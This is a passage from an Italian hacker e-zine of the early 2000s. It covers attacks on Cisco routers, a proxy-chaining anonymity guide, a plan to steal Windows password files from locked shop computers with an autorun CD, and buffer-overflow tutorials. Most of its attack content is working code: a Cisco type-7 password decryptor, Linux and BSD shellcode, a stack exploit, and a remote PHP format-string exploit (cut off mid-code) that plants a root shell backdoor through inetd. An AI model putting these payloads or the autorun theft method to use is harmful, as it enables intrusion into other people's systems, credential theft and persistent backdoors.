Router, di smanettare con i Cisco di qualche piccolo provider locale o di un piccolo Server con una macchina che funga da Router. Ma NON mettetevi in testa di bucare un Router di un grosso provider, altrimenti rischiate di finire nella merda... Ma che ve lo dico a fare, tanto poi voi fate comunque quel che volete... ;) * Come attaccare un Router * Ci sono vari modi per attaccare un Router. Quello che può essere il più facile da applicare rimane quello descritto anche da Spider nel suo txt trattante i Router, scritto per la Tank Commandos Crew. Esso consiste nell'aprire una sessione telnet col Cisco individuato e nella prime richieste inserire una enorme stringa del tipo: 4f53dg454ghsd#@@6257842890(&/89hgugdkurkjsncnvbk.rfdfgy77y04n/*-+kodng52+h 8h9u-i*7d6*tg-d,., #include char xlat[] = { 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44 }; char pw_str1[] = "password 7 "; char pw_str2[] = "enable-password 7 "; char *pname; cdecrypt(enc_pw, dec_pw) char *enc_pw; char *dec_pw; { unsigned int seed, i, val = 0; if(strlen(enc_pw) & 1) return(-1); seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0'; if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) return(-1); for (i = 2 ; i <= strlen(enc_pw); i++) { if(i !=2 && !(i & 1)) { dec_pw[i / 2 - 2] = val ^ xlat[seed++]; val = 0; } val *= 16; if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val += enc_pw[i] - '0'; continue; } if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val += enc_pw[i] - 'A' + 10; continue; } if(strlen(enc_pw) != i) return(-1); } dec_pw[++i / 2] = 0; return(0); } usage() { fprintf(stdout, "Usage: %s -p \n", pname); fprintf(stdout, " %s \n", pname); return(0); } main(argc,argv) int argc; char **argv; { FILE *in = stdin, *out = stdout; char line[257]; char passwd[65]; unsigned int i, pw_pos; pname = argv[0]; if(argc > 1) { if(argc > 3) { usage(); exit(1); } if(argv[1][0] == '-') { switch(argv[1][1]) { case 'h': usage(); break; case 'p': if(cdecrypt(argv[2], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } fprintf(stdout, "password: %s\n", passwd); break; default: fprintf(stderr, "%s: unknow option.", pname); } return(0); } if((in = fopen(argv[1], "rt")) == NULL) exit(1); if(argc > 2) if((out = fopen(argv[2], "wt")) == NULL) exit(1); } while(1) { for(i = 0; i < 256; i++) { if((line[i] = fgetc(in)) == EOF) { if(i) break; fclose(in); fclose(out); return(0); } if(line[i] == '\r') i--; if(line[i] == '\n') break; } pw_pos = 0; line[i] = 0; if(!strncmp(line, pw_str1, strlen(pw_str1))) pw_pos = strlen(pw_str1); if(!strncmp(line, pw_str2, strlen(pw_str2))) pw_pos = strlen(pw_str2); if(!pw_pos) { fprintf(stdout, "%s\n", line); continue; } if(cdecrypt(&line[pw_pos], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } else { if(pw_pos == strlen(pw_str1)) fprintf(out, "%s", pw_str1); else fprintf(out, "%s", pw_str2); fprintf(out, "%s\n", passwd); } } } --- Finisci di tagliare qui --- Questo è tutto quello che avevo da dire per quanto riguarda come bucare un Cisco. Ora vedremo i comandi del Router, per poterci lavorare meglio sopra... * Quali sono i comandi di un Cisco Router? * Allora… In questa sezione parleremo dei comandi principali di un Cisco e ci smanetteremo un po' sopra. Poiché la miglior teoria è la pratica, vi consiglio vivamente di scaricarvi il "Boson Router Simulator", che potete scaricare anche al mio sito, www.x-system.cjb.net, oppure al sito ufficiale www. programma che ho scaricato secondo consiglio di Nobody88, noto membro degli Spp, in un suo breve articolo su un numero dell'e-zine NewByes. Questo prog, funzionante sotto Win, una volta installato sul vostro sistema e lanciato simula un vero e proprio Cisco Router. Ed è mica male per imparare a spadroneggiare con i comandi! Io ho fatto per voi la traduzione dei Lab (i primi due... proprio le basi insomma...), piccole guide ai comandi e alle loro funzioni, che come già detto in precedenza sono diversi dai comandi di sistemi *nix. Innanzitutto avviate il programma e selezionate il Router 1, con il quale noi lavoreremo. Premete il tasto e noterete Router> Esso è il router prompt. A questo punto, entrato nel programma (che per noi equivale ad essere loggati in un router remoto... ;DD), digita '?', comando che come puoi immaginare ti mostrerà tutti i comandi disponibili nel router con la relativa descrizione. Poichè ora sei solo un utente, devi usare il comando 'enable' per entrare nel router in modo privilegiato. Noterai il cmabiamento del prompt in Router# Penso proprio che ci voglia poco a capire il cambiamento se siete dei linuxiani... Ad ogni modo il cambiamento del prompt significa che ora siete utenti privilegiati (per fare un esempio, equivale al root di sistemi *nix o al administrator di sistemi NT). Ora, digita nuovamente '?' e noterai l'aggiunta di nuovi comandi (chissà perchè... ;)). Prova a digitare 'show ?' e noterai altri comandi disponibili e loro descrizione. Dopo aver osservato i vari comandi e magari averci smanettato un po' su, digitate 'show running-config' per vedere ed osservare la configurazione del vostro router (un po' malandata la configurazione... non vi pare? eheheh), premendo il tasto space bar per completare la lettura delle informazioni. Parliamo ora di memorie. Più precisamente di memorie flash e history. La memoria flash è quella che contiene i files image dell'OS. La puoi vedere con il comando 'show flash'. Esiste poi la memoria history che puoi osservare con il comando 'show history' e contiene, di default, gli ultimi 10 comandi (vi dovrebbe ricordare il file .history presente nelle cartelle di ogni utente in sistemi linux...). Puoi ripercorrere la memoria history con la combinazione di tasti P e N. Parliamo ancora del comando 'show'! Un bel po' usato, non vi pare? show protocols : ti permette di vedere lo stato corrente del tuo router. show version : ti permette di vedere la piattaforma del router, l'os version, numero di interfaccia, la registrazione ed altro. show clock : ti permette di vedere l'ora e la data del tuo router. show hosts : ti permette di vedere host ed ip address del tuo router. show users : ti permette di vedere la lista di tutti gli utenti connessi al tuo router. show interfaces : ti da' le informazioni dettagliate su ogni interfaccia del tuo router. A questo punto, finita la sessione di lavoro puoi usare i comandi 'exit' o 'disable' (la funzione è esattamente la stessa) per tornare all'utente precedente, ovvero l'User non privilegiato. Bene... Credo proprio che le basi sul lavoro da poter svolgere in un Cisco Router ce le abbiate (anzi... le abbiamo... eheheh) ma comunque un po' di documentazione in più non vi fa male, perciò cominciate anche voi a tradurvi le lezioni successive dei Lab presenti sul Boson Router Simulator. * Conclusioni * Anche stavolta ho terminato il mio lavoro... Che dirvi... Mi raccomando solo di non fare cazzate se non sapete ciò che state facendo e se volete davvero farlo, assicuratevi prima di avere davvero le buone competenze per riuscire nel vostro intento. Un sito internet dove potrete trovare molta documentazione è www.cisco.com. Visitatelo, può essere utile. Poichè non ho davvero nient'altro da dirvi, vi saluto ed un arrivederci al prossimo testo sui Cisco Router. ;-) |-------------------------------------| |Art. N° <3> : "Multiproxy" di Elektro| |-------------------------------------| M U L T I P R O X Y ...ovvero vi svelo quello che molti di voi mi chiedono con parecchia insistenza da molto tempo... Autore: Elektro Web: www.x-system.cjb.net Mail: teo1987@libero.it Data: 02/12/12 Ciao a tutti! Viste le numerosissime richieste di molti di voi, eccovi una guida al prog Multiproxy, raggiungibile all'url www.multiproxy.org. La versione attuale, se non vado errato è la 1.2, perciò scaricatevi quella. A mio parere Multiproxy è il miglior prog per anonimizzarsi in Rete su piattaforme Win: impostati un determinato numero di proxy, voi potete usare questi come 'ponti' per le connessioni dalla vostra macchina al vostro obiettivo. Ecco un piccolo schema che forse vi chiarirà il caos che molti di voi ora avranno in testa: 127.0.0.1 ---> Proxy1 ---> Proxy2 ---> Proxy3 ---> Proxy4 ---> Proxy ecc. ---> Obiettivo E l'uso non è poi così complesso come a molti di voi può sembrare. Innanzitutto avviate Multiproxy, che in automatico proverà a testare i proxy. Al termine di questo test, dovete controllare quali proxy sono sfruttabili e quali invece non rispondono ai ping: per far questo andate nel menù Proxy List ---> Options ---> Proxy server list e vedrete i proxy segnalati con punti rossi e altri con punti verdi. Quelli verdi sono quelli sfruttabili per in nostri scopi ;) mentre quelli rossi sono da eliminare; per eliminarli andate in Menu ---> Proxy list ---> Delete non-responding. Se invece volete aggiungere una lista di proxy, perchè quella di default non ha 'soddisfatto le vostre aspettative' ;) andate nuovamente su Menù ---> Files ---> Import proxy list e ripetete tutto dall'inizio per testare i nuovi proxy. NB = Per trovare liste corpose di proxy sempre aggiornati, andate sempre all'URL www.multiproxy.org. Ora dovete solo configurare il vostro browser, o i programmi con i quali volete agire nell'ombra ;), mettendo nelle impostazioni per i proxy quel che segue: Proxy: 127.0.0.1 Porta: 8088 Come spero abbiate capito 127.0.0.1, indica il vostro computer. Perchè allora tutto ciò? Semplicissimo. Multiproxy al suo avvio apre nella vostra macchina la porta 8088, la quale si collega poi ai vari proxy fino al vostro obiettivo. Semplice vero? Spero abbiate capito tutto... E poi questa non era una lezione difficile come molte altre... Almeno ora ho chiarito l'utilizzo di questo prog e spero che ora le mail con oggetto Multiproxy arriveranno in quantità più limitate... ;-)) Byez |------------------------------------------------------------| |Art. N° <4> : "Fregare le pass di pc protetti..." di Raptor_| |------------------------------------------------------------| Fregare i file di password dei pc protetti da password degli screen saver (un nome più corto no eh??? ) [Commento di Elektro: Rap, puoi dirlo forte... Ho dovuto tagliare il titolo ben due volte perchè non ci stava tutto... ;))] DISCLAIMER L'autore non si ritiene responsabile per l'uso che può essere fatto del seguente testo in quanto è solo a scopo puramente informativo. Autore: Raptor_ saluti & ringraziamenti: Selphi5,ciro,rafel'o matt(senza di te non mi sarei divertito l'anno scorso rafè!!!),il mio prof di fisica e Einstein anche se è morto... :\ Fuck: A chiunque è coinvolto negli attentati sull'america, al prof di kimika e a molti altri. Allora come avrete notato dal titolo questo articolo cerca di spiegare come fregare i file di password dai pc protetti dalla password degli screen saver. IMPORTANTE: l'idea mi è venuta leggendo una e-zine non ricordo quale cmq grazie lo stesso. Materiale occorrente: un masterizzatore (qualunque va bene) un floppy (vuoto possibilmente altrimenti dove mettete il file di password???) un cd (io consiglio quelli piccolini da 185mb per praticità ) un amico. ora creare un altro file da chiamare autorun.inf (già vedo che iniziate a capire :P ) ----------------------inizio autorun.inf------------------------ [autorun] OPEN=fp.exe -----------------------fine autorun.inf------------------------- (il file fp.exe cioè l'allegato è un programmino che copia tutti i *.pwl che trova in c:\windows) Bene ora mettete questi bei due file (autorun.inf e fp.exe) su un bel cd =) ora chiamate un vostro amico, prendete il cd e correte verso il primo supermercato che conoscete mentre correte fermatevi, ricordatevi che vi siete dimenticati il floppy,ritornate a casa prendete il floppy ritornate al supermercato e mentre il vostro amico distrae l'addetto al settore magari chiedendogli di fargli vedere qualche cosa che sta abbastanza lontano dai pc voi inserite il floppy e il cd, così anche se il pc sarà bloccato dallo screen saver il programma verrà eseguito ugualmente e voi avrete il file pwl nel floppy =). Ah dimenticavo... occhio alle telecamere. Beh mi sembra di aver finito a presto !!! Raptor_ rapt0rxx@hotmail.com |-----------------------------------------------------------------------| |Art. N° <5> : "Come è strutturato un exploit di Buffer Overflow" di e4m| |-----------------------------------------------------------------------| [E4M] TEZKATLIPOKA@LIBERO.IT BLACK FORCE CREW #BFC ON IRC.AZZURRANET.ORG _________________________________________ __________________________________________________________________ |"*"|Coded by e4m____________________________________________|*|-|x| |101010101010101010101010101010101010101010101010101010101010101010| |010101010101010101010101010101010101010101010101010101010101010101| |010101010101010111010101001000100010100100101001010101010410101010| |10| \ 01010101 / \101010101/ \/ \01000| |10| ________| 01010101/ /| |01010101/ \1011| |10| |________ 010101 / /0| |0101010| /\ /\ |100| |01| | 101011/ /01| |0101010| /0 \ /01\ |110| |10| ________| 10100/ /010| |0101010| |01 \/010 | |010| |01| |0101010110101/ /0100| |0101001| |010101010| |110| |01| |01010101010_/ \0110| \____ | |010101010| |011|_____ |10| |/ \ | \01010101/ |100|!!!!/ |01|______________/|_______ ___________||_____\010101/_____|011|!!!/ |011010010101010101011101010| |010101001010101010101010101010101|!!/ |010101011010101100100101010| |010101010101010101010101010101010|!/ |010010100101001010010101001|____|010101011101010101010101001101010|/ -------------------------------------------------------------------- ________[-=COME E' STRUTTURATO UN EXPILOT SU STRUTTURA BUFFER OVERFLOW=-]_________ Thanks to fides Rosiello Angelo refle@libero.it -=Innazitutto,cos e un buffer overflow?=- _________________________________________ Un buffer overflow è un traboccamento dati. Ad esempio: char input[] = "123456789"; char buffer[7]; strcpy(buffer, input); In questo caso otterremo un overflow poichè i caratteri in input immessi nel buffer sono 11, mentre è stato dichiarato il char buffer di un massimo di 10 caratteri. La corretta versione del programma è: char input[] = "1234567"; char buffer[7]; strncpy(buffer, input, sizeof(buffer)); In questo caso non avremo alcun tipo di traboccamento. Tutto consta dunque, nel fare molta attenzione durante implementazione del software. Cosa succede ai byte(s) in eccesso? Nella memoria il nostro overflow appare a grandi linee così: buffer sfp ret [BBBBBBBBBB][xxxx][xxxx] Questa è una parte dello stack frame. Sostanzialmente abbiamo 10 bytes di buffer, 4 bytes dello Stack Frame Pointer e altri 4 di Indirizzo di ritorno. Ad esempio: strcpy(one, two); printf("String copied.\n"); quando strcpy() è richiamato nel codice e termina la sua funzione, il programma rimanda l'esecuzione all'indirizzo di ritorno posto nello stack frame. Ora pensiamo se si riuscisse ad eseguire qualche altro passo invece di ritornare ad eseguire lo strcpy(), di saltare cioè ad un indirizzo che noi assegnamo. Facciamo ipotesi che il programma sia di proprietà root (uid 0) e che sia suid +s. Se l'indirizzo di ritorno potesse essere reindirizzato allo shell code.. beh il gioco è fatto :> ! Guardiamo Lo Stack Frame nella memoria quando copiamo 18 bytes nel buffer invece di 10. Nell'esempio seguente viene effettuato uno strcpy() di 18 'd' nel buffer. buffer sfp ret [dddddddddd][dddd][dddd] In questo esempio l'indirizzo di ritorno è 0x64646464 dove 0x64 è il codice ascii della lettera 'D'. Ovviamente possiamo raggiungere qualsiasi indirizzo di ritorno avvalendoci dell'uso dei NULL. Un qualsiasi data's string è terminato da un NULL, quindi se poniamo l'indirizzo di ritorno come 0x64006464, questo dovrebbe ottenere il NULL come la fine della stringa e la restante parte 6464 non dovrebbe essere copiata nel buffer. Questo succede con ogni data segment che applichiamo al buffer. -=Lo Stack Pointer.=- _____________________ Qualsiasi programma ha un stack pointer che è l'indirizzo iniziale dello stack. E' possibile trovare lo Stack Pointer di un sistema usando il seguente codice: unsigned long sp(void) { __asm__("movl %esp, %eax"); } void main(void) { printf("0x%x\n", sp()); } La funzione sp() contiene l'istruzione assembler che copia il valore dello stack pointer (registro eax), nel buffer di ritorno (registro esp), stampandolo. $ ./sp 0xbfbffbc8 $ Okay! Ora sappiamo che lo stack pointer è 0xbfbffbc8, ciò significa che se scrivessimo un programma, qualsiasi variabile dichiarata sarebbe allocata nell'indirizzo di memoria immediatamente successivo a questo indirizzo. Con un po' di tentativi assistiti dalla fortuna è così possibile trovare l'indirizzo di un buffer all'interno della memoria. -=Shellcode=- _____________ Per comprendere bene cosa è uno shellcode è necessario avere delle buone basi di assembler, ecco perchè preferisco non approfondire troppo l'argomento, potremmo rischiare di divagare. Lo shellcode è un semplice programma in assembler che esegue una shell (/bin/sh). Un esempio di shell code è: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80 -=Come e fatto un expilot=- ___________________________ Debbuggiamo questo di Rosiello Angelo tnx! 1) /* programma vulnerabile.c */ int main(int argc, char *argv[]) { char buffer[500]; if(argc>=2) strcpy(buffer, argv[1]); return 0; } Come e possibile vedere questo programma andrà in overflow se scriviamo più di 500 caratteri come primo argomento. Ecco il file che manderà in overflow il nostro programmino! 2) /* overflow.c */ void main() { char buffer[501]; memset(&buffer, 'a', sizeof(buffer)); execl("./vulnerable", "vulnerable", buffer, 0); } $ gcc -o overflow overflow.c $ ./overflow Bus error $ Per completare l'exploit e necessario ora far eseguire lo shellcode. Dobbiamo ricordare che lo stack pointer punta all'inizio dello stack, quindi l'indirizzo del buffer deve essere molto prossimo a questo. Ma come facciamo a sapere esattamente a quale indirizzo saltare? Non è possibile in effetti saperlo a priori, ma l'uso del NOP può facilitarci il compito. Un NOP è un istruzione \x90 in assembler che non fa nulla e passa all'istruzione successiva. I NOP in effetti sono spesso utilizzati per realizzare delays. Come possiamo utilizzare questi NOP? Bene noi dobbiamo effettuare un salto all'inizio del buffer del nostro programma vulnerabile per eseguire lo shellcode, ma non sappiamo esattamente dove saltare. Ma se i primi 200 bytes del buffer fossero NOP prima dello shellcode ? Allora potremmo saltare ad ogni posizione nel buffer finchè non viene raggiunto ed eseguito lo shellcode! Con questo sistema abbiamo solo bisogno di sapere in linee generali dove è il buffer, per raggiungere lo stack pointer e sottrargli un offset con un incremento di 30 o 40, finchè non raggiungiamo un NOP nel buffer. Introduciamo noi un buffer nel codice dell'exploit di 600 bytes e una linea di comando che ci consente di specificare l'offset dello stack pointer. /* exploit.c */ #include #define BUFFERSIZE 600 /* vulnerable buffer + 100 bytes */ /* shellcode for freebsd (*bsd?) */ char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; /* linux x86 shellcode */ char lunixshell[] = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x$ "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\x$ "\x80\xe8\xde\xff\xff\xff/bin/sh"; unsigned long sp(void) { __asm__("movl %esp, %eax"); } void usage(char *cmd) { printf("\nusage: %s \n\n", cmd); printf("OS types are: 1. FreeBSD (*bsd?) 2. Linux\n\n"); exit(-1); } int main(int argc, char *argv[]) { int i, offset, os; long esp, ret, *addr_ptr; char *buffer, *ptr, *osptr; if(argc<3) usage(argv[0]); /* quit if they didnt specify an offset */ offset = atoi(argv[1]); /* get the offset they specified */ esp = sp(); /* get the stack pointer */ ret = esp-offset; /* sp - offset = return address */ os = atoi(argv[2]); /* get os */ if(os<1 || os>2) usage(argv[0]); printf("Stack pointer: 0x%x\n", esp); printf(" Offset: 0x%x\n", offset); printf(" Return addr: 0x%x\n", ret); /* allocate memory for our buffer */ if(!(buffer = malloc(BUFFERSIZE))) { printf("Couldn't allocate memory.\n"); exit(-1); } /* fill buffer with ret addr's */ ptr = buffer; addr_ptr = (long *)ptr; for(i=0; i : "Buffur Overflow - Esempio Chiaro" di e4m| |-------------------------------------------------------| [E4M] TEZKATLIPOKA@LIBERO.IT BLACK FORCE CREW #BFC ON IRC.AZZURRANET.ORG _________________________________________ __________________________________________________________________ |"*"|Coded by e4m____________________________________________|*|-|x| |101010101010101010101010101010101010101010101010101010101010101010| |010101010101010101010101010101010101010101010101010101010101010101| |010101010101010111010101001000100010100100101001010101010410101010| |10| \ 01010101 / \101010101/ \/ \01000| |10| ________| 01010101/ /| |01010101/ \1011| |10| |________ 010101 / /0| |0101010| /\ /\ |100| |01| | 101011/ /01| |0101010| /0 \ /01\ |110| |10| ________| 10100/ /010| |0101010| |01 \/010 | |010| |01| |0101010110101/ /0100| |0101001| |010101010| |110| |01| |01010101010_/ \0110| \____ | |010101010| |011|_____ |10| |/ \ | \01010101/ |100|!!!!/ |01|______________/|_______ ___________||_____\010101/_____|011|!!!/ |011010010101010101011101010| |010101001010101010101010101010101|!!/ |010101011010101100100101010| |010101010101010101010101010101010|!/ |010010100101001010010101001|____|010101011101010101010101001101010|/ -------------------------------------------------------------------- ----------------------------------------------------------------------------------------------- _____________ ------------\ ____________ | | \_____ _____-------------|-----------/ ______/ | | > | -+- | \/ |___________ / ______/ |___ | -+- | | | __ / | | ________/ ________/| ___| | ____/ | | \ --+-- | | | | | |______ | | \ | +-- | | | | | | \ | |\ \ |______|______/___________/|____| |___| <______________/ <____| \___> < O V E R F L O W > Da visualizzare ASSOLUTAMENTE con il carattere TERMINAL di notepad :) Questo e' solo un semplice esempio molto piu TErRIbIlMeNtE facile della guida inizile ..cmq li' viene descritto tutto kiaramnte ^_^ Quindi questo dovrebbe essere un +optional+ +---------------------------+ |char input[] = "123456789";| |char buffer[7]; | <---Trabboccamento :D |strcpy(buffer, input); | +---------------------------+ Note: le lettere sono bytes (1)=1byte (2)=1byte e cosi via... *=tutti qualsiasi Bytes trabboccati FuOrI..!! | | Byte In uscita lol -----------| / Registro I [Puo' contenere 7bytes] Out | ________ / | |-------<<<--------------------<<<---------------|--|________|/ +------Connessi |---------->>>-------------------->>>------------|--|________|\ | In | \ | |-------------- rotfl \ Registro II [Puo' contenere *bytes] Bytes in entrata | | Portano il livello del buffer ad un aumento costante [9bytes] rofl (ossia registro 2) accetta dati nO=9 + imput dall'utente -->+ char input[] = "123456789" ; lol (ossia registro 1) accetta dati nO=7 + owerflovva xke -->+ char buffer[7] ; Comandi x il buffer ---> strcpy(buffer, input) ; -------------------------------------------------------------------------------------------------------------------- |-------------------------------------------------| |Art. N° <7> : "Ritornando all'overflow..." di e4m| |-------------------------------------------------| [E4M] TEZKATLIPOKA@LIBERO.IT BLACK FORCE CREW #BFC ON IRC.AZZURRANET.ORG _________________________________________ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°ÛÛÛÛÛÛÛ°°°°°°°°Û°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°Û°°°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛ°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°ÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°ÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ..proudly presents.. Per la visione di questo tute e' CONSIGLIATO IL CARATTERE terminal per visualizzare anke gli ascii correttamente! Progammando in vba... alla fine son riuscito a scrivere un owerflow attraverso una progressbar che trabbocca i dati visto ke pbar1=max(ha il len settato al max) ma,non e' stato settato il pbar1=min _________________________________________ Private Sub Command1_Click() pbar1.Max = Len(cString) pbar1.Value = nLoop cReturn = cReturn + Caracter End Sub _________________________________________ VISTO IN TUTTI I LINUAGGI SI OTTIENE UN TRABBOCCAMENTO DATI,KE NON E' ALTRO UN ERRORE DI BYTE IN ECCESSO... ___________________________________________________________________________________________ ALTRI EXPILOT SU BUFFER OVERFLOW TUTTO O QUASI E DUBBUGGATO NEL PRIMO MANUALE----> /* * PHP 3.0.16/4.0.2 remote format overflow exploit. * Copyright (c) 2000 * Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau * gneisenau@berlin.com * my regards to sheib and darkx * All rights reserved * Pascal Boucheraine's paper was enlightening * THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS CODE. * YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS AND I CANNOT BE HELD RESPONSIBLE * FOR THE CONSEQUENCES * Usage: * phpxpl -sx -uwww.victim.com/some.php3 | nc www.victim.com 80 * * Slackware 7.0: eip address/shellcode address * 0xbfff9b90/0xbfff958c * */ /* * We just printf the shellcode and stuff and nc it to the target */ #include #include #include #include #include // this exploit does not like 0x0a = '\n' in the shellcode. also the NULL at // the end of the shellcode will be removed as the shellcode is probably // strcatted into the buffer. so do it again in the shellcode. /* * This shellcode is for Linux/x86. * This shellcode spawns a shell and runs the command * echo 'ingreslock stream tcp nowait root /bin/bash bash -i'>/tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf */ char shellcode[] = { 0xeb,0x41, 0x5e, 0x31,0xc0, 0x31,0xdb, 0xb0,0xa0, 0x89,0x34,0x06, 0x8d,0x4e,0x07, 0x88,0x19, 0x41, 0x41, 0xb0,0xa4, 0x89,0x0c,0x06, 0x8d,0x4e,0x0b, 0x88,0x19, 0x41, 0xb0,0xa8, 0x89,0x0c,0x06, 0x8d,0x4e,0x7f, 0x88,0x19, 0x31,0xd2, 0xb0,0xac, 0x89,0x14,0x06, 0x89,0xf3, 0x89,0xf1, 0xb0,0xa0, 0x01,0xc1, 0xb0,0x0b, 0xcd,0x80, 0x31,0xc0, 0xb0,0x01, 0x31,0xdb, 0xcd,0x80, 0xe8,0xba,0xff,0xff,0xff, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0xff,0xff, /* the string "/bin/sh" */ 0x2d,0x63,0xff, /* the string "-c" */ 0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69, 0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74, 0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77, 0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69, 0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20, 0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f, 0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65, 0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65, 0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00, }; #define NOP 0x90 ____________________________________________________________________________________________ /* * the PHP3 error buffer will already contain PHP 3 Warning: The Content-Type * string was "multipart/form-data. This is 66 bytes long. we send 2 spaces * for padding the addresses we embed in our attack buffer on word boundary */ #define PHP3_WARNING 68 #define BUF_LEN 1024 struct system_type { char *name; unsigned int nop; char *shellcode; int shellcode_len; int offset; /* the number of pops we need to get to our own data*/ int already_written; /* number of bytes written by printf by the time we reach the our embedded data */ unsigned int eip_address; /* address where shellcode_address must be put */ unsigned int shellcode_address; /* address of shellcode in memory */ }; struct system_type systems[] = { { "Slackware Linux 7.0 - i386/Apache 1.3.12/PHP 3.0.16 (static module)", 0x90, shellcode, 270, /* not exact but we got lots of space ;) */ 27, 0x152, 0xbfff9c30, 0xbfff962c, }, // somebody find these and fill it in please. should be // straightforward. { "Red Hat 6.0 - i386/Apache 1.3.13/PHP 3.0.16 (static module)", (unsigned int)NULL, NULL, (int)NULL, (int)NULL, (int)NULL, (unsigned int)NULL, (unsigned int)NULL, }, { NULL, (unsigned int)NULL, NULL, (int)NULL, (int)NULL, (int)NULL, (unsigned int)NULL, (unsigned int)NULL, }, }; void usage (void); void parse_url (char *, char *); void prepare_attack_buffer (char *, struct system_type *, char *); int calculate_precision (unsigned int, int); int main (int argc, char *argv[]) { char attack_buffer[2000]; // we construct the shellcode and stuff here // the target is 1024 bytes long struct system_type *sysptr; char *url; // i hope these things dont get bigger than this char target[2048]; // target will contain only the FQDN unsigned int eip_address = 0, shellcode_address = 0; int ctr = 0; int nop_count; char *walk; int arg; // at least expect a system type and url from the command line if (argc < 3) usage (); // parse arguments while ((arg = getopt (argc, argv, "s:u:e:h:")) != -1){ switch (arg){ case 'h': sscanf (optarg, "%x", &shellcode_address); break; case 'e': sscanf 